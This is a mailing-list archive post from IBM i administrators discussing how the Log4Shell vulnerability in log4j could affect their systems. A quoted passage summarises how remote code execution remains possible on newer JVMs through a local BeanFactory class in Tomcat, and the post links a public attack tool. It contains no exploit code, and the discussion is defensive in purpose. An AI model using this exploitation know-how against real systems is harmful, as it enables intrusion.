Brad,

They don't need credentials because the malicious code runs in the same
context as the Java app with a vulnerable version of log4j.

The full vulnerability, older JVM + log4j2, is really bad as the
malicious actor gets to load & run his/her own code from a remote server.

As I understand it, with a newer JVM, it's not quite as bad, given that the
malicious actor has to find and mis-use a local java class; however, From
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

References and object construction with factories are still supported,
just remote codebases are prohibited. Michael Stepankin in
https://www.veracode.com/blog/research/exploiting-jndi-injections-java describes
how the Apache XBean *BeanFactory* can be used in a returned Reference to
achieve code execution. This class has to be locally available on the
targeted system, however, it is for example included in Apache Tomcat. If
your application runs in Tomcat, bad luck.
https://github.com/veracode-research/rogue-jndi also has another vector
for WebSphere.


Now I am not a Java guru, nor have I really spent any time working on how
to maliciously work an IBM i...so I can't give you a step by step or a hard
example. But I can say that my repo on our dev box with code for running
Apache Camel & Kafka on the IBM i popped up on our security teams radar.

Luckily, most malicious actors concentrate on Windows/Linux. But I'm
willing to bet some of them are familiar with the IBM i.

Charles


On Tue, Dec 14, 2021 at 1:38 PM Brad Stone <bvstone@xxxxxxxxx> wrote:

Thanks for clipping this from my post:

Not a hypothetical.. real world. Maybe if you found it on your system..
step us through how someone could cause harm without having credentials to
your system.

Thanks..... maybe there will be another TP shortage because of this...

On Tue, Dec 14, 2021 at 12:50 PM Jack Woehr via MIDRANGE-L <
midrange-l@xxxxxxxxxxxxxxxxxx> wrote:

On Tue, Dec 14, 2021 at 11:40 AM Brad Stone <bvstone@xxxxxxxxx> wrote:

Anyone care to share a real world example of how this would hurt
someone
on
the IBM i? From what I understand it requires a lot of variables...
one
being that the attacker needs to be able to inject commands into the
logger.




https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j

--
Jack Woehr, IBM Champion 2021
<

https://www.youracclaim.com/badges/528d23d6-087f-4698-8d17-d59688106ac4/public_url

Absolute Performance, Inc.
12303 Airport Way, Suite 100
Broomfield, CO 80021

NON-DISCLOSURE NOTICE: This communication including any and all
attachments is for the intended recipient(s) only and may contain
confidential and privileged information. If you are not the intended
recipient of this communication, any disclosure, copying further
distribution or use of this communication is prohibited. If you received
this communication in error, please contact the sender and delete/destroy
all copies of this communication immediately.
--
This is the Midrange Systems Technical Discussion (MIDRANGE-L) mailing
list
To post a message email: MIDRANGE-L@xxxxxxxxxxxxxxxxxx
To subscribe, unsubscribe, or change list options,
visit: https://lists.midrange.com/mailman/listinfo/midrange-l
or email: MIDRANGE-L-request@xxxxxxxxxxxxxxxxxx
Before posting, please take a moment to review the archives
at https://archive.midrange.com/midrange-l.

Please contact support@xxxxxxxxxxxxxxxxxxxx for any subscription related
questions.

Help support midrange.com by shopping at amazon.com with our affiliate
link: https://amazon.midrange.com

--
This is the Midrange Systems Technical Discussion (MIDRANGE-L) mailing list
To post a message email: MIDRANGE-L@xxxxxxxxxxxxxxxxxx
To subscribe, unsubscribe, or change list options,
visit: https://lists.midrange.com/mailman/listinfo/midrange-l
or email: MIDRANGE-L-request@xxxxxxxxxxxxxxxxxx
Before posting, please take a moment to review the archives
at https://archive.midrange.com/midrange-l.

Please contact support@xxxxxxxxxxxxxxxxxxxx for any subscription related
questions.

Help support midrange.com by shopping at amazon.com with our affiliate
link: https://amazon.midrange.com


As an Amazon Associate we earn from qualifying purchases.

This thread ...

Follow-Ups:
Replies:

Follow On AppleNews
Return to Archive home page | Return to MIDRANGE.COM home page

This mailing list archive is Copyright 1997-2022 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].

Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.